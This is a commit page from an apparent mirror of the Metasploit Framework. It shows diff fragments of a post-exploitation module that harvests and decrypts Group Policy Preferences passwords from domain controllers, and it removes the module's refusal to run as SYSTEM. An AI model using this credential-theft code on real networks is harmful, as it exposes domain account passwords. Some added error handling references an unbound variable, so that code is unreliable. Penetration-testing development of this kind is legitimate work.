infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Allowed to run as SYSTEM

unstable
Meatballs1 2012-06-22 11:17:24 +01:00
parent 2a3cd6e343 9da2dd816c
commit 0ed49998e2
1 changed files with 25 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
modules/post/windows/gather/credentials/gpp.rb
View File

@ -28,9 +28,6 @@ class Metasploit3 < Msf::Post
Users can specify ALL=True to target all domains and their domain controllers
on the network.
This module must be run under a domain user or the user will not have appropriate
permissions to read files from the domain controller(s).
},
'License' => MSF_LICENSE,
'Author' =>[
@ -58,11 +55,6 @@ class Metasploit3 < Msf::Post
end
def run
if is_system?
print_error "This needs to be run as a Domain User, not SYSTEM"
return nil
end
dcs = []
paths = []
@ -87,7 +79,7 @@ class Metasploit3 < Msf::Post
dcs << found_dcs[0] unless found_dcs.to_a.empty?
end
elsif datastore['CURRENT']
dcs << get_domain_controller()
dcs << get_domain_controller
else
print_error "Invalid Arguments, please supply one of CURRENT, ALL or DOMAINS arguments"
return nil
@ -156,6 +148,15 @@ class Metasploit3 < Msf::Post
user = node.attributes['userName']
newname = node.attributes['newName']
disabled = node.attributes['acctDisabled']
action = node.attributes['action']
expires = node.attributes['expires']
never_expires = node.attributes['neverExpires']
description = node.attributes['description']
full_name = node.attributes['fullName']
no_change = node.attributes['noChange']
change_logon = node.attributes['changeLogon']
sub_authority = node.attributes['subAuthority']
changed = node.parent.attributes['changed'] # n.b. parent attribute.
# Check if policy also specifies the user is renamed.
if !newname.to_s.empty?
@ -166,7 +167,7 @@ class Metasploit3 < Msf::Post
# UNICODE conversion
pass = pass.unpack('v*').pack('C*')
print_good("DOMAIN CONTROLLER: #{domain_controller} USER: #{user} PASS: #{pass} DISABLED: #{disabled}")
print_good "DOMAIN CONTROLLER: #{domain_controller} USER: #{user} PASS: #{pass} DISABLED: #{disabled} CHANGED: #{changed}"
if session.db_record
source_id = session.db_record.id
@ -203,7 +204,7 @@ class Metasploit3 < Msf::Post
#enum_domains.rb
def enum_domains
print_status "Enumerating Domains on the Network..."
domain_enum = 80000000 # SV_TYPE_DOMAIN_ENUM = hex 80000000
domain_enum = 80000000 # SV_TYPE_DOMAIN_ENUM
buffersize = 500
result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domain_enum,nil,nil)
# Estimate new buffer size on percentage recovered.
@ -222,14 +223,15 @@ class Metasploit3 < Msf::Post
base = 0
domains = []
mem = client.railgun.memread(startmem, 8*count)
count.times{|i|
count.times do |i|
x = {}
x[:platform] = mem[(base + 0),4].unpack("V*")[0]
nameptr = mem[(base + 4),4].unpack("V*")[0]
x[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join
domains << x
base = base + 8
}
end
return domains
end
@ -277,7 +279,9 @@ class Metasploit3 < Msf::Post
value = v.data
open_key.close
rescue
print_error e.message
end
return value
end
@ -289,9 +293,15 @@ class Metasploit3 < Msf::Post
v_name = "DCName"
domain = reg_getvaldata(subkey, v_name)
rescue
print_error "This host is not part of a domain."
print_error e.message
end
if domain.nil?
print_error "No domain controller retrieved - is this machine part of a domain?"
return nil
else
return domain.sub!(/\\\\/,'')
end
return domain.sub!(/\\\\/,'')
end
end